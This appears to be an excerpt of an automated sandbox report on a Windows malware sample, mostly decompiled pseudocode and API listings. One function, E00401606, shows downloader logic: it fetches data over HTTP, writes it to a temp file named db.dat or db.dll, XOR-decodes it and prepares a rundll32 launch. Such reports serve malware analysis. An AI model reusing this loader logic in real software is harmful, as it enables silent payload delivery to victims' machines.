                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: __decode_pointer$__lock_doexit
                                                                                              • String ID:
                                                                                              • API String ID: 3276244213-0
                                                                                              • Opcode ID: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                              • Instruction ID: 7f0d12db5e07b25a45548384765bf865e08fdd7b9915468ee134ad778ae1647b
                                                                                              • Opcode Fuzzy Hash: 44ea3af290a5c0fced421c48bee69f607f8ea4075bd654cc3defe53151bfea1d
                                                                                              • Instruction Fuzzy Hash: 04A02470D4030035D51011007C03F04771017C0F00FF040347704340D071757114400F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E00401CEB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                              				intOrPtr _v0;
                                                                                              				void* _v804;
                                                                                              				intOrPtr _v808;
                                                                                              				intOrPtr _v812;
                                                                                              				intOrPtr _t6;
                                                                                              				intOrPtr _t11;
                                                                                              				intOrPtr _t12;
                                                                                              				intOrPtr _t13;
                                                                                              				long _t17;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t22;
                                                                                              				intOrPtr _t25;
                                                                                              				intOrPtr _t26;
                                                                                              				intOrPtr _t27;
                                                                                              				intOrPtr* _t31;
                                                                                              				void* _t34;
                                                                                              
                                                                                              				_t27 = __esi;
                                                                                              				_t26 = __edi;
                                                                                              				_t25 = __edx;
                                                                                              				_t22 = __ecx;
                                                                                              				_t21 = __ebx;
                                                                                              				_t6 = __eax;
                                                                                              				_t34 = _t22 -  *0x41205c; // 0xc28b62e0
                                                                                              				if(_t34 == 0) {
                                                                                              					asm("repe ret");
                                                                                              				}
                                                                                              				 *0x4134a8 = _t6;
                                                                                              				 *0x4134a4 = _t22;
                                                                                              				 *0x4134a0 = _t25;
                                                                                              				 *0x41349c = _t21;
                                                                                              				 *0x413498 = _t27;
                                                                                              				 *0x413494 = _t26;
                                                                                              				 *0x4134c0 = ss;
                                                                                              				 *0x4134b4 = cs;
                                                                                              				 *0x413490 = ds;
                                                                                              				 *0x41348c = es;
                                                                                              				 *0x413488 = fs;
                                                                                              				 *0x413484 = gs;
                                                                                              				asm("pushfd");
                                                                                              				_pop( *0x4134b8);
                                                                                              				 *0x4134ac =  *_t31;
                                                                                              				 *0x4134b0 = _v0;
                                                                                              				 *0x4134bc =  &_a4;
                                                                                              				 *0x4133f8 = 0x10001;
                                                                                              				_t11 =  *0x4134b0; // 0x0
                                                                                              				 *0x4133ac = _t11;
                                                                                              				 *0x4133a0 = 0xc0000409;
                                                                                              				 *0x4133a4 = 1;
                                                                                              				_t12 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v812 = _t12;
                                                                                              				_t13 =  *0x412060; // 0x3d749d1f
                                                                                              				_v808 = _t13;
                                                                                              				 *0x4133f0 = IsDebuggerPresent();
                                                                                              				_push(1);
                                                                                              				E00405D04(_t14);
                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                              				_t17 = UnhandledExceptionFilter(0x40f1fc);
                                                                                              				if( *0x4133f0 == 0) {
                                                                                              					_push(1);
                                                                                              					E00405D04(_t17);
                                                                                              				}
                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                              			}



















                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401ceb
                                                                                              0x00401cf1
                                                                                              0x00401cf3
                                                                                              0x00401cf3
                                                                                              0x00402207
                                                                                              0x0040220c
                                                                                              0x00402212
                                                                                              0x00402218
                                                                                              0x0040221e
                                                                                              0x00402224
                                                                                              0x0040222a
                                                                                              0x00402231
                                                                                              0x00402238
                                                                                              0x0040223f
                                                                                              0x00402246
                                                                                              0x0040224d
                                                                                              0x00402254
                                                                                              0x00402255
                                                                                              0x0040225e
                                                                                              0x00402266
                                                                                              0x0040226e
                                                                                              0x00402279
                                                                                              0x00402283
                                                                                              0x00402288
                                                                                              0x0040228d
                                                                                              0x00402297
                                                                                              0x004022a1
                                                                                              0x004022a6
                                                                                              0x004022ac
                                                                                              0x004022b1
                                                                                              0x004022bd
                                                                                              0x004022c2
                                                                                              0x004022c4
                                                                                              0x004022cc
                                                                                              0x004022d7
                                                                                              0x004022e4
                                                                                              0x004022e6
                                                                                              0x004022e8
                                                                                              0x004022ed
                                                                                              0x00402301

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004022B7
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004022CC
                                                                                              • UnhandledExceptionFilter.KERNEL32(0040F1FC), ref: 004022D7
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004022F3
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004022FA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 5f471ff89ca9fbf612256ad7c697b5195c406620861bfe622fa18a49d49e12a3
                                                                                              • Instruction ID: c6d8937d366fcf68b61b06612f08007e77c6d46df488356e52913741a684a185
                                                                                              • Opcode Fuzzy Hash: 5f471ff89ca9fbf612256ad7c697b5195c406620861bfe622fa18a49d49e12a3
                                                                                              • Instruction Fuzzy Hash: 9221C074400208DFD702DF64EE496857BA4FB08316F50817AE909A73A1D7B49A88CF1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 88%
                                                                                              			E0040A6FE() {
                                                                                              				signed int _v8;
                                                                                              				char _v16;
                                                                                              				void* __esi;
                                                                                              				signed int _t8;
                                                                                              				intOrPtr* _t15;
                                                                                              				intOrPtr _t16;
                                                                                              				char _t20;
                                                                                              				intOrPtr _t22;
                                                                                              				intOrPtr _t23;
                                                                                              				signed int _t24;
                                                                                              				int _t25;
                                                                                              				signed int _t27;
                                                                                              
                                                                                              				_t8 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t8 ^ _t27;
                                                                                              				_t24 = 0;
                                                                                              				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                              					L4:
                                                                                              					_t25 = GetACP();
                                                                                              				} else {
                                                                                              					_t20 = _v16;
                                                                                              					_t15 =  &_v16;
                                                                                              					if(_t20 == 0) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						do {
                                                                                              							_t15 = _t15 + 1;
                                                                                              							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                              							_t20 =  *_t15;
                                                                                              						} while (_t20 != 0);
                                                                                              						if(_t24 == 0) {
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return E00401CEB(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                              			}















                                                                                              0x0040a704
                                                                                              0x0040a70b
                                                                                              0x0040a70f
                                                                                              0x0040a72b
                                                                                              0x0040a74c
                                                                                              0x0040a752
                                                                                              0x0040a72d
                                                                                              0x0040a72d
                                                                                              0x0040a732
                                                                                              0x0040a735
                                                                                              0x00000000
                                                                                              0x0040a737
                                                                                              0x0040a737
                                                                                              0x0040a73d
                                                                                              0x0040a73e
                                                                                              0x0040a742
                                                                                              0x0040a744
                                                                                              0x0040a74a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a74a
                                                                                              0x0040a735
                                                                                              0x0040a762

                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32 ref: 0040A711
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 0040A723
                                                                                              • GetACP.KERNEL32 ref: 0040A74C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$InfoThread
                                                                                              • String ID:
                                                                                              • API String ID: 4232894706-0
                                                                                              • Opcode ID: 9dc245bb9bb79a43418577a82daf1765ae67b9332b47f13ae5eb2880b88cb3ba
                                                                                              • Instruction ID: 6d5b1195a7d9dfb51ed6ba6d1794b3205ee3fcd555b1d372361513d58bc3bfe6
                                                                                              • Opcode Fuzzy Hash: 9dc245bb9bb79a43418577a82daf1765ae67b9332b47f13ae5eb2880b88cb3ba
                                                                                              • Instruction Fuzzy Hash: DFF0C231E013289BDB25DBB499156EF77B4AB04B00B00817EDD81F7280D674ED088799
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 37%
                                                                                              			E0040668C(void* __eax, void* __ebx, void* __edx) {
                                                                                              				_Unknown_base(*)()* _t8;
                                                                                              
                                                                                              				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                              				_t8 = SetUnhandledExceptionFilter(E004057A9());
                                                                                              				 *0x413dcc = 0;
                                                                                              				return _t8;
                                                                                              			}




                                                                                              0x00406691
                                                                                              0x004066a1
                                                                                              0x004066a7
                                                                                              0x004066ae

                                                                                              APIs
                                                                                              • __decode_pointer.LIBCMT ref: 0040669A
                                                                                                • Part of subcall function 004057A9: TlsGetValue.KERNEL32(00000010,00405830,?,?), ref: 004057B6
                                                                                                • Part of subcall function 004057A9: TlsGetValue.KERNEL32(00000004,?,?), ref: 004057CD
                                                                                                • Part of subcall function 004057A9: RtlDecodePointer.NTDLL(?,?,?), ref: 00405800
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004066A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 3433037573-0
                                                                                              • Opcode ID: 6cb5d8bd007598591282acbfc73d455ca3b835f30aecd9385909291d78e67587
                                                                                              • Instruction ID: 54e2becfbd485be6123adb9c922f800016ea6b6d01121be30819734945897b22
                                                                                              • Opcode Fuzzy Hash: 6cb5d8bd007598591282acbfc73d455ca3b835f30aecd9385909291d78e67587
                                                                                              • Instruction Fuzzy Hash: 35C08C244383814ACB016B38784D3893E20AB92A02F4084BFD100D2082C67C81888A29
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 38%
                                                                                              			E00401606(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int* _t114;
                                                                                              				signed int _t115;
                                                                                              				intOrPtr* _t116;
                                                                                              				intOrPtr* _t118;
                                                                                              				intOrPtr* _t119;
                                                                                              				intOrPtr* _t124;
                                                                                              				void* _t125;
                                                                                              				intOrPtr* _t126;
                                                                                              				void* _t130;
                                                                                              				void* _t131;
                                                                                              				WCHAR* _t136;
                                                                                              				long _t139;
                                                                                              				struct HINSTANCE__* _t140;
                                                                                              				_Unknown_base(*)()* _t141;
                                                                                              				_Unknown_base(*)()* _t147;
                                                                                              				signed int _t151;
                                                                                              				intOrPtr* _t155;
                                                                                              				signed int* _t159;
                                                                                              				long _t168;
                                                                                              				intOrPtr _t169;
                                                                                              				intOrPtr _t170;
                                                                                              				signed int _t174;
                                                                                              				signed int _t176;
                                                                                              				void* _t183;
                                                                                              				signed int _t184;
                                                                                              				intOrPtr _t192;
                                                                                              				signed char _t195;
                                                                                              				void* _t206;
                                                                                              				void* _t207;
                                                                                              				void* _t208;
                                                                                              
                                                                                              				_t196 = __edi;
                                                                                              				E0040C7B1(E0040EDEC, __ebx, __edi, __esi);
                                                                                              				_t174 = 0;
                                                                                              				_t202 = _t206 - 0x234;
                                                                                              				 *((intOrPtr*)(_t206 - 0x238)) = 0;
                                                                                              				 *((intOrPtr*)(_t206 - 0x21c)) = 0;
                                                                                              				E0040107D(__ecx, _t206 - 0x234, _t206,  *((intOrPtr*)(_t206 + 8)));
                                                                                              				 *((intOrPtr*)(_t206 - 4)) = 0;
                                                                                              				__imp__#8(_t206 - 0x248, 0x2a4);
                                                                                              				_push(_t206 - 0x21c);
                                                                                              				_push(0x410e40);
                                                                                              				_push(0x17);
                                                                                              				_push(0);
                                                                                              				_push(0x410e50);
                                                                                              				 *((char*)(_t206 - 4)) = 1;
                                                                                              				if( *0x414380() >= 0) {
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					_t114 = E004010D7(0, __edx, _t206 - 0x228, 0x412fb8, __eflags);
                                                                                              					 *((char*)(_t206 - 4)) = 2;
                                                                                              					_t115 =  *_t114;
                                                                                              					__eflags = _t115;
                                                                                              					if(_t115 == 0) {
                                                                                              						_t176 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t176 =  *_t115;
                                                                                              					}
                                                                                              					_t116 =  *((intOrPtr*)(_t206 - 0x21c));
                                                                                              					_t208 = _t207 - 0x10;
                                                                                              					_t202 = _t206 - 0x258;
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					_t196 =  *((intOrPtr*)( *_t116 + 0x24))(_t116, _t176,  *((intOrPtr*)(_t206 - 0x234)));
                                                                                              					 *((char*)(_t206 - 4)) = 1;
                                                                                              					_t118 =  *((intOrPtr*)(_t206 - 0x228));
                                                                                              					__eflags = _t118 - _t174;
                                                                                              					if(_t118 != _t174) {
                                                                                              						_t202 = _t118;
                                                                                              						_t168 = InterlockedDecrement(_t118 + 8);
                                                                                              						__eflags = _t168 - _t174;
                                                                                              						if(_t168 == _t174) {
                                                                                              							__eflags = _t202 - _t174;
                                                                                              							if(_t202 != _t174) {
                                                                                              								_t169 =  *_t202;
                                                                                              								__eflags = _t169 - _t174;
                                                                                              								if(_t169 != _t174) {
                                                                                              									__imp__#6(_t169);
                                                                                              								}
                                                                                              								_t170 =  *((intOrPtr*)(_t202 + 4));
                                                                                              								__eflags = _t170 - _t174;
                                                                                              								if(__eflags != 0) {
                                                                                              									_push(_t170);
                                                                                              									L00401E50(_t174, _t196, _t202, __eflags);
                                                                                              								}
                                                                                              								_push(_t202);
                                                                                              								E00401CE6(_t174, _t196, _t202, __eflags);
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					__eflags = _t196 - _t174;
                                                                                              					if(_t196 < _t174) {
                                                                                              						L37:
                                                                                              						_t119 =  *((intOrPtr*)(_t206 - 0x21c));
                                                                                              						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                                                              						_t174 =  *((intOrPtr*)(_t206 - 0x238));
                                                                                              						goto L1;
                                                                                              					}
                                                                                              					_t124 =  *((intOrPtr*)(_t206 - 0x21c));
                                                                                              					_t196 = _t208 - 0x10;
                                                                                              					_t202 = 0x412fb8;
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					asm("movsd");
                                                                                              					_t125 =  *((intOrPtr*)( *_t124 + 0x34))(_t124);
                                                                                              					__eflags = _t125 - _t174;
                                                                                              					if(_t125 < _t174) {
                                                                                              						goto L37;
                                                                                              					}
                                                                                              					_t126 =  *((intOrPtr*)(_t206 - 0x21c));
                                                                                              					 *((intOrPtr*)( *_t126 + 0x38))(_t126, _t206 - 0x25c);
                                                                                              					__eflags =  *((intOrPtr*)(_t206 - 0x25c)) - 0xc8;
                                                                                              					if( *((intOrPtr*)(_t206 - 0x25c)) != 0xc8) {
                                                                                              						goto L37;
                                                                                              					}
                                                                                              					_t202 =  *((intOrPtr*)(_t206 - 0x21c));
                                                                                              					_t130 = _t206 - 0x248;
                                                                                              					 *((char*)(_t206 - 4)) = 3;
                                                                                              					__imp__#10(_t130, E0040116F(_t174,  *((intOrPtr*)(_t206 - 0x21c)), _t206 - 0x258));
                                                                                              					__eflags = _t130 - _t174;
                                                                                              					if(_t130 < _t174) {
                                                                                              						E0040A7D0(_t130);
                                                                                              					}
                                                                                              					_t131 = _t206 - 0x258;
                                                                                              					 *((char*)(_t206 - 4)) = 1;
                                                                                              					__imp__#9(_t131);
                                                                                              					__eflags =  *((short*)(_t206 - 0x248)) - 0x2011;
                                                                                              					if( *((short*)(_t206 - 0x248)) != 0x2011) {
                                                                                              						goto L37;
                                                                                              					} else {
                                                                                              						__imp__#17( *((intOrPtr*)(_t206 - 0x240)));
                                                                                              						_t202 = 1;
                                                                                              						__eflags = _t131 - 1;
                                                                                              						if(_t131 != 1) {
                                                                                              							goto L37;
                                                                                              						}
                                                                                              						__imp__#20( *((intOrPtr*)(_t206 - 0x240)), 1, _t206 - 0x22c);
                                                                                              						__imp__#19( *((intOrPtr*)(_t206 - 0x240)), 1, _t206 - 0x220);
                                                                                              						 *((intOrPtr*)(_t206 - 0x220)) =  *((intOrPtr*)(_t206 - 0x220)) + 1;
                                                                                              						__imp__#23( *((intOrPtr*)(_t206 - 0x240)), _t206 - 0x230);
                                                                                              						__eflags =  *((intOrPtr*)(_t206 + 0xc)) - 1;
                                                                                              						 *((intOrPtr*)(_t206 - 0x27c)) = 0x64002e;
                                                                                              						 *((intOrPtr*)(_t206 - 0x254)) = 0x64002e;
                                                                                              						 *(_t206 - 0x280) = 0x620064;
                                                                                              						 *((intOrPtr*)(_t206 - 0x278)) = 0x740061;
                                                                                              						 *((intOrPtr*)(_t206 - 0x274)) = _t174;
                                                                                              						 *(_t206 - 0x258) = 0x620064;
                                                                                              						 *((intOrPtr*)(_t206 - 0x250)) = 0x6c006c;
                                                                                              						 *((intOrPtr*)(_t206 - 0x24c)) = _t174;
                                                                                              						_t136 = _t206 - 0x280;
                                                                                              						if( *((intOrPtr*)(_t206 + 0xc)) != 1) {
                                                                                              							_t136 = _t206 - 0x258;
                                                                                              						}
                                                                                              						 *(_t206 - 0x224) = _t136;
                                                                                              						 *(_t206 - 0x270) = 0x450054;
                                                                                              						 *((intOrPtr*)(_t206 - 0x26c)) = 0x50004d;
                                                                                              						 *((intOrPtr*)(_t206 - 0x268)) = _t174;
                                                                                              						_t139 = GetEnvironmentVariableW(_t206 - 0x270, _t206 - 0x218, 0x104);
                                                                                              						__eflags = _t139;
                                                                                              						if(_t139 != 0) {
                                                                                              							lstrcatW(_t206 - 0x218, "\\");
                                                                                              							lstrcatW(_t206 - 0x218,  *(_t206 - 0x224));
                                                                                              							 *(_t206 - 0x224) = _t206 - 0x218;
                                                                                              						}
                                                                                              						_t140 = E004011F5();
                                                                                              						_t202 = GetProcAddress;
                                                                                              						_t141 = GetProcAddress(_t140, "wsprintfW");
                                                                                              						__eflags =  *((intOrPtr*)(_t206 + 0xc)) - 2;
                                                                                              						if( *((intOrPtr*)(_t206 + 0xc)) == 2) {
                                                                                              							 *((intOrPtr*)(_t206 - 0x2b0)) = 0x750072;
                                                                                              							 *((intOrPtr*)(_t206 - 0x2ac)) = 0x64006e;
                                                                                              							 *((intOrPtr*)(_t206 - 0x2a8)) = 0x6c006c;
                                                                                              							 *((intOrPtr*)(_t206 - 0x2a4)) = 0x320033;
                                                                                              							 *((intOrPtr*)(_t206 - 0x2a0)) = 0x65002e;
                                                                                              							 *((intOrPtr*)(_t206 - 0x29c)) = 0x650078;
                                                                                              							 *((intOrPtr*)(_t206 - 0x298)) = 0x220020;
                                                                                              							 *((intOrPtr*)(_t206 - 0x294)) = 0x730025;
                                                                                              							 *((intOrPtr*)(_t206 - 0x290)) = 0x2c0022;
                                                                                              							 *((intOrPtr*)(_t206 - 0x28c)) = 0x70006f;
                                                                                              							 *((intOrPtr*)(_t206 - 0x288)) = 0x6e0065;
                                                                                              							 *((intOrPtr*)(_t206 - 0x284)) = _t174;
                                                                                              							 *_t141(0x413f68, _t206 - 0x2b0,  *(_t206 - 0x224));
                                                                                              						}
                                                                                              						 *((intOrPtr*)(_t206 - 0x228)) = GetProcAddress(E00401237(), "WriteFile");
                                                                                              						 *((intOrPtr*)(_t206 - 0x260)) = GetProcAddress(E00401237(), "CloseHandle");
                                                                                              						_t147 = GetProcAddress(E00401237(), "CreateFileW");
                                                                                              						_t196 =  *_t147( *(_t206 - 0x224), 0x40000000, _t174, _t174, 2, 0x80, _t174);
                                                                                              						__eflags = _t196 - 0xffffffff;
                                                                                              						if(_t196 == 0xffffffff) {
                                                                                              							L36:
                                                                                              							__imp__#24( *((intOrPtr*)(_t206 - 0x240)));
                                                                                              							goto L37;
                                                                                              						} else {
                                                                                              							__eflags =  *((intOrPtr*)(_t206 + 0xc)) - 2;
                                                                                              							if( *((intOrPtr*)(_t206 + 0xc)) != 2) {
                                                                                              								_push(_t174);
                                                                                              								_push(_t206 - 0x264);
                                                                                              								_t151 =  *((intOrPtr*)(_t206 - 0x220)) -  *((intOrPtr*)(_t206 - 0x22c));
                                                                                              								__eflags = _t151;
                                                                                              								_push(_t151);
                                                                                              								_push( *((intOrPtr*)(_t206 - 0x230)));
                                                                                              								L35:
                                                                                              								 *((intOrPtr*)(_t206 - 0x228))(_t196);
                                                                                              								 *((intOrPtr*)(_t206 - 0x260))(_t196);
                                                                                              								 *((intOrPtr*)(_t206 - 0x238)) = 1;
                                                                                              								goto L36;
                                                                                              							}
                                                                                              							_t192 =  *((intOrPtr*)(_t206 - 0x220));
                                                                                              							_t202 = 0x1751;
                                                                                              							_t183 = _t192 -  *((intOrPtr*)(_t206 - 0x22c)) - 0x1751;
                                                                                              							_t155 =  *((intOrPtr*)(_t206 - 0x230)) + 0x1751;
                                                                                              							__eflags = _t183 - 1;
                                                                                              							if(_t183 <= 1) {
                                                                                              								L33:
                                                                                              								_push(_t174);
                                                                                              								_push(_t206 - 0x264);
                                                                                              								_push(_t192 -  *((intOrPtr*)(_t206 - 0x22c)) - _t202);
                                                                                              								_push( *((intOrPtr*)(_t206 - 0x230)) + 0x1751);
                                                                                              								goto L35;
                                                                                              							}
                                                                                              							_t195 =  *_t155;
                                                                                              							_t184 = _t183 - 1;
                                                                                              							while(1) {
                                                                                              								 *(_t184 + _t155) =  *(_t184 + _t155) ^ _t195;
                                                                                              								_t184 = _t184 - 1;
                                                                                              								__eflags = _t184;
                                                                                              								if(_t184 == 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t195 =  *((intOrPtr*)(_t184 + _t155 + 1));
                                                                                              							}
                                                                                              							_t159 = _t155 + _t184;
                                                                                              							 *_t159 =  *_t159 ^ _t159[0];
                                                                                              							__eflags =  *_t159;
                                                                                              							_t192 =  *((intOrPtr*)(_t206 - 0x220));
                                                                                              							goto L33;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L1:
                                                                                              				__imp__#9(_t206 - 0x248);
                                                                                              				__imp__#6( *((intOrPtr*)(_t206 - 0x234)));
                                                                                              				return E0040C7FB(_t174, _t196, _t202);
                                                                                              			}

































                                                                                              0x00401606
                                                                                              0x00401610
                                                                                              0x00401618
                                                                                              0x0040161b
                                                                                              0x00401621
                                                                                              0x00401627
                                                                                              0x0040162d
                                                                                              0x00401639
                                                                                              0x0040163c
                                                                                              0x00401648
                                                                                              0x00401649
                                                                                              0x0040164e
                                                                                              0x00401650
                                                                                              0x00401651
                                                                                              0x00401656
                                                                                              0x00401662
                                                                                              0x00401690
                                                                                              0x00401691
                                                                                              0x00401692
                                                                                              0x00401693
                                                                                              0x0040169a
                                                                                              0x0040169f
                                                                                              0x004016a3
                                                                                              0x004016a5
                                                                                              0x004016a7
                                                                                              0x004016ad
                                                                                              0x004016ad
                                                                                              0x004016a9
                                                                                              0x004016a9
                                                                                              0x004016a9
                                                                                              0x004016af
                                                                                              0x004016b7
                                                                                              0x004016c2
                                                                                              0x004016c8
                                                                                              0x004016c9
                                                                                              0x004016ca
                                                                                              0x004016cd
                                                                                              0x004016d1
                                                                                              0x004016d3
                                                                                              0x004016d7
                                                                                              0x004016dd
                                                                                              0x004016df
                                                                                              0x004016e1
                                                                                              0x004016e7
                                                                                              0x004016ed
                                                                                              0x004016ef
                                                                                              0x004016f1
                                                                                              0x004016f3
                                                                                              0x004016f5
                                                                                              0x004016f7
                                                                                              0x004016f9
                                                                                              0x004016fc
                                                                                              0x004016fc
                                                                                              0x00401702
                                                                                              0x00401705
                                                                                              0x00401707
                                                                                              0x00401709
                                                                                              0x0040170a
                                                                                              0x0040170f
                                                                                              0x00401710
                                                                                              0x00401711
                                                                                              0x00401716
                                                                                              0x004016f3
                                                                                              0x004016ef
                                                                                              0x00401717
                                                                                              0x00401719
                                                                                              0x00401a65
                                                                                              0x00401a65
                                                                                              0x00401a6e
                                                                                              0x00401a71
                                                                                              0x00000000
                                                                                              0x00401a71
                                                                                              0x0040171f
                                                                                              0x0040172a
                                                                                              0x0040172c
                                                                                              0x00401731
                                                                                              0x00401732
                                                                                              0x00401733
                                                                                              0x00401735
                                                                                              0x00401736
                                                                                              0x00401739
                                                                                              0x0040173b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401741
                                                                                              0x00401751
                                                                                              0x00401754
                                                                                              0x0040175e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401764
                                                                                              0x00401777
                                                                                              0x0040177e
                                                                                              0x00401782
                                                                                              0x00401788
                                                                                              0x0040178a
                                                                                              0x0040178d
                                                                                              0x0040178d
                                                                                              0x00401792
                                                                                              0x00401799
                                                                                              0x0040179d
                                                                                              0x004017a3
                                                                                              0x004017ac
                                                                                              0x00000000
                                                                                              0x004017b2
                                                                                              0x004017b8
                                                                                              0x004017c0
                                                                                              0x004017c1
                                                                                              0x004017c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004017d7
                                                                                              0x004017eb
                                                                                              0x004017f1
                                                                                              0x00401804
                                                                                              0x0040180a
                                                                                              0x0040181c
                                                                                              0x00401822
                                                                                              0x00401828
                                                                                              0x0040182e
                                                                                              0x00401838
                                                                                              0x0040183e
                                                                                              0x00401844
                                                                                              0x0040184a
                                                                                              0x00401850
                                                                                              0x00401856
                                                                                              0x00401858
                                                                                              0x00401858
                                                                                              0x0040185e
                                                                                              0x00401877
                                                                                              0x00401881
                                                                                              0x0040188b
                                                                                              0x00401891
                                                                                              0x00401897
                                                                                              0x00401899
                                                                                              0x004018ad
                                                                                              0x004018bc
                                                                                              0x004018c4
                                                                                              0x004018c4
                                                                                              0x004018cf
                                                                                              0x004018d4
                                                                                              0x004018db
                                                                                              0x004018dd
                                                                                              0x004018e1
                                                                                              0x004018f9
                                                                                              0x00401903
                                                                                              0x0040190d
                                                                                              0x00401913
                                                                                              0x0040191d
                                                                                              0x00401927
                                                                                              0x00401931
                                                                                              0x0040193b
                                                                                              0x00401945
                                                                                              0x0040194f
                                                                                              0x00401959
                                                                                              0x00401963
                                                                                              0x00401969
                                                                                              0x0040196b
                                                                                              0x00401980
                                                                                              0x00401993
                                                                                              0x0040199f
                                                                                              0x004019b8
                                                                                              0x004019ba
                                                                                              0x004019bd
                                                                                              0x00401a59
                                                                                              0x00401a5f
                                                                                              0x00000000
                                                                                              0x004019c3
                                                                                              0x004019c3
                                                                                              0x004019c7
                                                                                              0x00401a26
                                                                                              0x00401a2d
                                                                                              0x00401a34
                                                                                              0x00401a34
                                                                                              0x00401a3a
                                                                                              0x00401a3b
                                                                                              0x00401a41
                                                                                              0x00401a42
                                                                                              0x00401a49
                                                                                              0x00401a4f
                                                                                              0x00000000
                                                                                              0x00401a4f
